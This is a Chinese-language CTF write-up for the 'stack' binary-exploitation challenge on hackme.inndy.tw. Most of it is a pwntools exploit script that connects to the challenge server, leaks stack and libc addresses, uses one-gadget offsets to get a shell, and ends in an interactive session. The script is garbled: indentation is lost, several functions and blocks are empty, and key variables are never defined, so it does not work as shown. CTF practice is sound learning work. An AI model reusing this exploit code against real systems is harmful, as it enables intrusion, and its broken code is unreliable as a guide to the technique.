# stack的wp

https://hackme.inndy.tw/scoreboard/ 题目很有趣，我做了stack这个题目感觉还不错，我把wp分享出来，方便大家学习
stack的题目要求是：

nc hackme.inndy.tw 7716

Here is my C programming homework
But compiled with full protection (RELRO, PIE, NX, Stack Canary).
You can pwn it! Can't you?
https://github.com/Inndy/NTUST-CSIE-Homework/blob/master/C_Programming/2014-11-18/HW1118_B10315005_02.c

from pwn import *
import sys, os
import ctypes as ct

wordSz = 4
hwordSz = 2
bits = 32
PIE = 0
mypid=0

localMAGIC = 0x0003AC69      #locallibc
remoteMAGIC = 0x0003AC49      #remotelibc

context(arch='i386', os='linux', log_level='debug')

with open('/proc/%s/mem' % mypid) as mem:

def findModuleBase(pid, mem):
with open('/proc/%s/maps' % pid) as maps:
for line in maps:
if name in line:
bitFormat = u8(leak(addr + 4, 1))
if bitFormat == 2:
global wordSz
global hwordSz
global bits
wordSz = 8
hwordSz = 4
bits = 64
sys.exit(1)

global mypid
mypid = proc.pidof(r)[0]
raw_input('debug:')
with open('/proc/%s/mem' % mypid) as mem:
moduleBase = findModuleBase(mypid, mem)
gdb.attach(r, "set follow-fork-mode parent\nb *" + hex(moduleBase+addr))

def tohex(val, nbits):
return hex((val + (1 << nbits)) % (1 << nbits))

#r = process('/home/h11p/hackme/stack')

r = remote('hackme.inndy.tw', 7716)

elf = ELF('/home/h11p/hackme/stack')
print "bss:"+hex(elf.bss())

r.recvuntil('Cmd >>\n')
r.sendline('i')
r.sendline('1234')
r.recv()
for i in xrange(0,15):
r.sendline("p")
myrecv=r.recv()

if i==4:
print str(i)+":",
elif i==7:
print str(i) + ":",
elif i==13:
print str(i) + ":",

# remotelibc
print "libc_module:" + libc_module

'''
#locallibc
print "libc_module:" + libc_module
'''
for j in xrange(0,6):
print "this is:"+str(j)
r.sendline('i')
r.recv()

r.sendline('i')
#r.recv()

r.interactive()